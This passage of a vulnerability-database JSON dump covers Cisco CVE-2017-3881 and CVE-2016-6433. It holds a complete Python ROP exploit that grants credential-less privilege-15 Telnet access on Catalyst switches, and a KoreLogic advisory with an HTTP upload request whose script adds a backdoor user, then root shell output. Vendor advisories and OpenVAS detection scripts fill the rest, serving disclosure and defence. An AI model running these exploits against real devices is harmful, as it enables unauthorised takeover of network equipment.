Connection OK\r\n[+] Recieved bytes from telnet service: '\\xff\\xfb\\x01\\xff\\xfb\\x03\\xff\\xfd\\x18\\xff\\xfd\\x1f\\r\\ncatalyst1#'\r\n[+] Sending cluster option\r\n[+] Unsetting credless privilege 15 authentication\r\n[+] All done\r\n$ telnet 192.168.88.10\r\nEscape character is '^]'.\r\n\r\nUser Access Verification\r\n\r\nPassword: \r\n\r\n```\r\n\r\nThis RCE POC is available [here](https://github.com/artkond/cisco-rce/) for both firware versions. DoS version of this exploit is [available](https://github.com/artkond/cisco-rce/blob/master/ios_telnet_rocem.rb) as a metasploit module, it might work for most models mentioned in the Cisco advisory.", "cvss3": {}, "published": "2017-04-10T00:00:00", "type": "seebug", "title": "Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability (CVE-2017-3881)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-04-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92932", "id": "SSV:92932", "sourceData": "\n # c2960-lanbasek9-m-12.2.55.se11.py\r\n# \u5b8c\u6574 PoC \u53c2\u8003\uff1ahttps://github.com/artkond/cisco-rce/\r\n#!/usr/bin/python\r\n# Author:\r\n# Artem Kondratenko (@artkond)\r\n\r\nimport socket\r\nimport sys\r\nfrom time import sleep\r\n\r\nset_credless = True\r\n\r\nif len(sys.argv) < 3:\r\n\tprint sys.argv[0] + ' [host] --set/--unset'\r\n\tsys.exit()\r\nelif sys.argv[2] == '--unset':\r\n\tset_credless = False\r\nelif sys.argv[2] == '--set':\r\n\tpass\r\nelse:\r\n\tprint sys.argv[0] + ' [host] --set/--unset'\r\n\tsys.exit()\r\n\r\n\r\ns = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((sys.argv[1], 23))\r\n\r\nprint '[+] Connection OK'\r\nprint '[+] Recieved bytes from telnet service:', repr(s.recv(1024))\r\n#sleep(0.5)\r\nprint '[+] Sending cluster option'\r\n\r\nprint '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'\r\n\r\n\r\n\r\npayload = '\\xff\\xfa\\x24\\x00'\r\npayload += '\\x03CISCO_KITS\\x012:'\r\npayload += 'A' * 116\r\npayload += '\\x00\\x00\\x37\\xb4'\t\t# first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\n#next bytes are shown as offsets from r1\r\npayload += '\\x02\\x3d\\x55\\xdc'\t\t# +8 address of pointer to is_cluster_mode function - 0x34\r\nif set_credless is True:\r\n\tpayload += '\\x00\\x00\\x99\\x9c'\t# +12 set address of func that rets 1\r\nelse:\r\n\tpayload +=\t'\\x00\\x04\\xeA\\xe0'\t# unset \r\npayload += 'BBBB'\t\t\t\t\t# +16(+0) r1 points here at second gadget\r\npayload += '\\x00\\xe1\\xa9\\xf4' \t\t# +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;\r\npayload += 'CCCC'\t\t\t\t\t# +8 \r\npayload += 'DDDD'\t\t\t\t\t# +12\r\npayload += 'EEEE'\t\t\t\t\t# +16(+0) r1 points here at third gadget\r\npayload += '\\x00\\x06\\x7b\\x5c'\t\t# +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; \r\npayload += '\\x02\\x3d\\x55\\xc8'\t\t# +8 r1+8 = 0x23d55c8\r\npayload += 'FFFF'\t\t\t\t\t# +12 \r\npayload += 'GGGG'\t\t\t\t\t# +16(+0) r1 points here at fourth gadget \r\npayload += '\\x00\\x6c\\xb3\\xa0' \t\t# +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;\r\nif set_credless:\r\n\tpayload += '\\x00\\x27\\x0b\\x94'\t# +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr; \r\nelse:\r\n\tpayload += '\\x00\\x04\\xe7\\x78'\t# unset\r\npayload += 'HHHH'\t\t\t\t\t# +12\r\npayload += 'IIII'\t\t\t\t\t# +16(+0) r1 points here at fifth gadget\r\npayload += '\\x01\\x4a\\xcf\\x98'\t\t# +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\npayload += 'JJJJ'\t\t\t\t\t# +8 r1 points here at third gadget\r\npayload += 'KKKK'\t\t\t\t\t# +12\r\npayload += 'LLLL'\t\t\t\t\t# +16\r\npayload += '\\x01\\x14\\xe7\\xec'\t\t# +20 original execution flow return addr\r\npayload += ':15:' + '\\xff\\xf0'\r\n\r\ns.send(payload)\r\n\r\nprint '[+] All done'\r\n\r\ns.close()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92932", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "korelogic": [{"lastseen": "2023-06-03T18:46:46", "description": "1. Vulnerability Details\n\n Affected Vendor: Cisco\n Affected Product: Firepower Threat Management Console\n Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)\n Platform: Embedded Linux\n CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous\n Type, CWE-94: Improper Control of Generation of Code\n Impact: Arbitrary Code Execution\n Attack vector: HTTP\n CVE-ID: CVE-2016-6433\n\n2. Vulnerability Description\n\n An authenticated user can run arbitrary system commands as\n the www user which leads to root.\n\n3. Technical Description\n\n A valid session and CSRF token is required. The webserver runs as\n a non-root user which is permitted to sudo commands as root with\n no password.\n\n POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1\n Host: 1.3.3.7\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate, br\n DNT: 1\n Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6\n Connection: close\n Content-Type: multipart/form-data; boundary=---------------------------15519792567789791301241925798\n Content-Length: 813\n\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"manual_update\"\n\n 1\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"source\"\n\n file\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"file\"; filename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\"\n Content-Type: application/octet-stream\n\n sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"action_submit\"\n\n Import\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"sf_action_id\"\n\n 8c6059ae8dbedc089877b16b7be2ae7f\n -----------------------------15519792567789791301241925798--\n\n\n HTTP/1.1 200 OK\n Date: Sat, 23 Apr 2016 13:38:01 GMT\n Server: Apache\n Vary: Accept-Encoding\n X-Frame-Options: SAMEORIGIN\n Content-Length: 49998\n Connection: close\n Content-Type: text/html; charset=utf-8\n\n ...\n\n $ ssh korelogic@1.3.3.7\n Password:\n\n Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.\n Cisco is a registered trademark of Cisco Systems, Inc.\n All other trademarks are property of their respective owners.\n\n Cisco Fire Linux OS v6.0.1 (build 37)\n Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)\n\n Could not chdir to home directory /Volume/home/korelogic: No such file or directory\n korelogic@firepower:/$ sudo su -\n Password:\n root@firepower:~#\n\n4. Mitigation and Remediation Recommendation\n\n The vendor has acknowledged this vulnerability but has\n not issued a fix. Vendor acknowledgement available at:\n https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc2\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.\n\n6. Disclosure Timeline\n\n 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.\n 2016.06.30 - Cisco acknowledges receipt of vulnerability report.\n 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for\n this vulnerability and for 3 others reported in the\n same product.\n 2016.08.12 - 30 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.02 - 45 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.09 - KoreLogic asks for an update on the status of the\n remediation efforts.\n 2016.09.15 - Cisco confirms remediation is underway and soon to be\n completed.\n 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details\n will be released publicly on 2016.10.05.\n 2016.10.05 - Public disclosure.\n\n7. Proof of Concept\n\n See Technical Description", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-05T00:00:00", "type": "korelogic", "title": "Cisco Firepower Threat Management Console Remote Command Execution Leading to Root Access", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2016-10-05T00:00:00", "id": "KL-001-2016-007", "href": "https://korelogic.com/Resources/Advisories/KL-001-2016-007.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2023-05-25T14:46:05", "description": "A vulnerability in Cisco Firepower Threat Management Console could allow an authenticated, remote attacker to execute arbitrary commands on a targeted system.\n\nThe vulnerability exists because parameters sent to the web application are not properly validated. This may lead an authenticated web user to run arbitrary system commands as the www user account on the server. An attacker with user privileges on the web application may be able to leverage this vulnerability to gain access to the underlying operating system.\n\nCisco has released software updates that address this vulnerability. Workarounds that address this vulnerability are not available. \n\nThis advisory is available at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc[\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\"]", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-05T16:00:00", "type": "cisco", "title": "Cisco Firepower Threat Management Console Remote Command Execution Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2016-10-05T16:00:00", "id": "CISCO-SA-20161005-FTMC", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T08:36:52", "description": "A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges.\n\nThe Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors:\n\n The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and\nThe incorrect processing of malformed CMP-specific Telnet options.\n An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device.\n\nCisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp\"]", "cvss3": {}, "published": "2017-03-17T16:00:00", "type": "cisco", "title": "Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2019-04-17T18:47:43", "id": "CISCO-SA-20170317-CMP", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp", "cvss": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}], "openvas": [{"lastseen": "2020-04-07T18:45:01", "description": "A vulnerability in Cisco Firepower Threat Management Console could allow an\n authenticated, remote attacker to execute arbitrary commands on a targeted system.", "cvss3": {}, "published": "2016-10-06T00:00:00", "type": "openvas", "title": "Cisco Firepower Threat Management Console Remote Command Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2020-04-03T00:00:00", "id": "OPENVAS:1361412562310106333", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106333", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Cisco Firepower Threat Management Console Remote Command Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:firepower_management_center\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106333\");\n script_cve_id(\"CVE-2016-6433\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_version(\"2020-04-03T09:54:35+0000\");\n\n script_name(\"Cisco Firepower Threat Management Console Remote Command Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"A vulnerability in Cisco Firepower Threat Management Console could allow an\n authenticated, remote attacker to execute arbitrary commands on a targeted system.\");\n\n script_tag(name:\"insight\", value:\"The vulnerability exists because parameters sent to the web application are\n not properly validated. This may lead an authenticated web user to run arbitrary system commands as the www user\n account on the server.\");\n\n script_tag(name:\"impact\", value:\"An attacker with user privileges on the web application may be able to\n leverage this vulnerability to gain access to the underlying operating system.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 09:54:35 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-06 10:54:17 +0700 (Thu, 06 Oct 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_firepower_management_center_consolidation.nasl\");\n script_mandatory_keys(\"cisco/firepower_management_center/detected\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE, nofork:TRUE ) ) exit( 0 );\n\naffected = make_list(\n '5.2.0',\n '5.3.0',\n '5.3.0.2',\n '5.3.0.3',\n '5.3.0.4',\n '5.3.1',\n '5.3.1.3',\n '5.3.1.4',\n '5.3.1.5',\n '5.3.1.6',\n '5.4.1.3',\n '5.4.1.5',\n '5.4.1.4',\n '5.4.1.2',\n '5.4.1.1',\n '5.4.1',\n '5.4.0',\n '5.4.0.2',\n '5.4.1.6',\n '6.0.1' );\n\nforeach af ( affected ) {\n if( version == af ) {\n report = report_fixed_ver( installed_version:version, fixed_version: \"See advisory\" );\n security_message( port:0, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-10-09T15:15:35", "description": "A vulnerability in the Cisco Cluster Management Protocol (CMP) processing\ncode in Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an\naffected device or remotely execute code with elevated privileges.", "cvss3": {}, "published": "2017-03-20T00:00:00", "type": "openvas", "title": "Cisco IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2019-10-09T00:00:00", "id": "OPENVAS:1361412562310106671", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106671", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Cisco IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:cisco:ios_xe\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106671\");\n script_cve_id(\"CVE-2017-3881\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-10-09T06:43:33+0000\");\n\n script_name(\"Cisco IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"A vulnerability in the Cisco Cluster Management Protocol (CMP) processing\ncode in Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an\naffected device or remotely execute code with elevated privileges.\");\n\n script_tag(name:\"insight\", value:\"The Cluster Management Protocol utilizes Telnet internally as a signaling\nand command protocol between cluster members. The vulnerability is due to the combination of two factors:\n\n - The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between\ncluster members and instead accept and process such options over any Telnet connection to an affected device, and\n\n - The incorrect processing of malformed CMP-specific Telnet options.\n\nAn attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing\na Telnet session with an affected Cisco device configured to accept Telnet connections.\");\n\n script_tag(name:\"impact\", value:\"An exploit could allow an attacker to execute arbitrary code and obtain full\ncontrol of the device or cause a reload of the affected device.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-10-09 06:43:33 +0000 (Wed, 09 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-20 11:02:32 +0700 (Mon, 20 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_ios_xe_version.nasl\");\n script_mandatory_keys(\"cisco_ios_xe/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\naffected = make_list(\n '2.2.0',\n '2.2.1',\n '2.2.2',\n '2.2.3',\n '2.3.0',\n '2.3.1',\n '2.3.1t',\n '2.3.2',\n '2.4.0',\n '2.4.1',\n '2.4.2',\n '2.4.3',\n '2.5.0',\n '2.5.1',\n '2.6.0',\n '2.6.1',\n '3.1.0SG',\n '3.1.1SG',\n '3.2.0SG',\n '3.2.0XO',\n '3.2.10SG',\n '3.2.11SG',\n '3.2.1SG',\n '3.2.2SG',\n '3.2.3SG',\n '3.2.4SG',\n '3.2.5SG',\n '3.2.6SG',\n '3.2.7SG',\n '3.2.8SG',\n '3.2.9SG',\n '3.3.0SG',\n '3.3.0SQ',\n '3.3.0XO',\n '3.3.1SG',\n '3.3.1SQ',\n '3.3.1XO',\n '3.3.2SG',\n '3.3.2XO',\n '3.4.0SG',\n '3.4.0SQ',\n '3.4.1SG',\n '3.4.1SQ',\n '3.4.2SG',\n '3.4.3SG',\n '3.4.4SG',\n '3.4.5SG',\n '3.4.6SG',\n '3.4.7SG',\n '3.4.7a.SG',\n '3.4.8SG',\n '3.4.9SG',\n '3.5.0E',\n '3.5.0SQ',\n '3.5.1E',\n '3.5.1SQ',\n '3.5.2E',\n '3.5.2SQ',\n '3.5.3E',\n '3.5.3SQ',\n '3.5.4SQ',\n '3.5.5SQ',\n '3.5.7SQ',\n '3.6.0E',\n '3.6.1E',\n '3.6.2E',\n '3.6.2a.E',\n '3.6.3E',\n '3.6.4E',\n '3.6.5E',\n '3.6.5a.E',\n '3.6.5b.E',\n '3.6.6E',\n '3.7.0E',\n '3.7.1E',\n '3.7.2E',\n '3.7.3E',\n '3.7.4E',\n '3.7.5E',\n '3.8.0E',\n '3.8.0EX',\n '3.8.1E',\n '3.8.1S',\n '3.8.2E',\n '3.8.3E',\n '3.9.0E',\n '3.9.1E');\n\nforeach af (affected) {\n if (version == af) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-09T15:13:00", "description": "A vulnerability in the Cisco Cluster Management Protocol (CMP) processing\ncode in Cisco IOS Software could allow an unauthenticated, remote attacker to cause a reload of an affected\ndevice or remotely execute code with elevated privileges.", "cvss3": {}, "published": "2017-03-20T00:00:00", "type": "openvas", "title": "Cisco IOS Software Cluster Management Protocol Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2019-10-09T00:00:00", "id": "OPENVAS:1361412562310106670", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106670", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Cisco IOS Software Cluster Management Protocol Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:cisco:ios\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106670\");\n script_cve_id(\"CVE-2017-3881\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-10-09T06:43:33+0000\");\n\n script_name(\"Cisco IOS Software Cluster Management Protocol Remote Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"A vulnerability in the Cisco Cluster Management Protocol (CMP) processing\ncode in Cisco IOS Software could allow an unauthenticated, remote attacker to cause a reload of an affected\ndevice or remotely execute code with elevated privileges.\");\n\n script_tag(name:\"insight\", value:\"The Cluster Management Protocol utilizes Telnet internally as a signaling\nand command protocol between cluster members. The vulnerability is due to the combination of two factors:\n\n - The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between\ncluster members and instead accept and process such options over any Telnet connection to an affected device, and\n\n - The incorrect processing of malformed CMP-specific Telnet options.\n\nAn attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing\na Telnet session with an affected Cisco device configured to accept Telnet connections.\");\n\n script_tag(name:\"impact\", value:\"An exploit could allow an attacker to execute arbitrary code and obtain full\ncontrol of the device or cause a reload of the affected device.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-10-09 06:43:33 +0000 (Wed, 09 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-20 09:25:26 +0700 (Mon, 20 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ssh_cisco_ios_get_version.nasl\");\n script_mandatory_keys(\"cisco_ios/version\", \"cisco_ios/image\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nimage = get_kb_item(\"cisco_ios/image\");\n\nif (!image || (image !~ \"^C23(5|6)0\" && image !~ \"^C29(18|28|60|70|75)\" && image !~ \"^C35(50|60)\" &&\n image !~ \"^C3750\" && image !~ \"^C4(0|5)00\" && image !~ \"^C49(00|28|48)\" &&\n image !~ \"^WS-CBS30(12|20|30|32|40)\" && image !~ \"^WS-CBS31(1|2|3)0\" && image !~ \"^IE(2|3|4|5)000\" &&\n image !~ \"^IE(3|4)010\"))\n exit(99);\n\nif( ! version = get_app_version( cpe:CPE ) ) exit( 0 );\n\naffected = make_list(\n '12.1(11)EA1',\n '12.1(11)EA1a',\n '12.1(12c)EA1',\n '12.1(12c)EA1a',\n '12.1(13)EA1',\n '12.1(13)EA1a',\n '12.1(13)EA1b',\n '12.1(13)EA1c',\n '12.1(14)AZ',\n '12.1(14)EA1',\n '12.1(14)EA1a',\n '12.1(14)EA1b',\n '12.1(19)EA1',\n '12.1(19)EA1a',\n '12.1(19)EA1b',\n '12.1(19)EA1c',\n '12.1(19)EA1d',\n '12.1(20)EA1',\n '12.1(20)EA1a',\n '12.1(20)EA2',\n '12.1(22)EA1',\n '12.1(22)EA10',\n '12.1(22)EA10a',\n '12.1(22)EA10b',\n '12.1(22)EA11',\n '12.1(22)EA12',\n '12.1(22)EA13',\n '12.1(22)EA14',\n '12.1(22)EA1a',\n '12.1(22)EA1b',\n '12.1(22)EA2',\n '12.1(22)EA3',\n '12.1(22)EA4',\n '12.1(22)EA4a',\n '12.1(22)EA5',\n '12.1(22)EA5a',\n '12.1(22)EA6',\n '12.1(22)EA6a',\n '12.1(22)EA7',\n '12.1(22)EA8',\n '12.1(22)EA8a',\n '12.1(22)EA9',\n '12.1(6)EA1',\n '12.1(8)EA1c',\n '12.1(9)EA1',\n '12.2(137)SG',\n '12.2(144)SG',\n 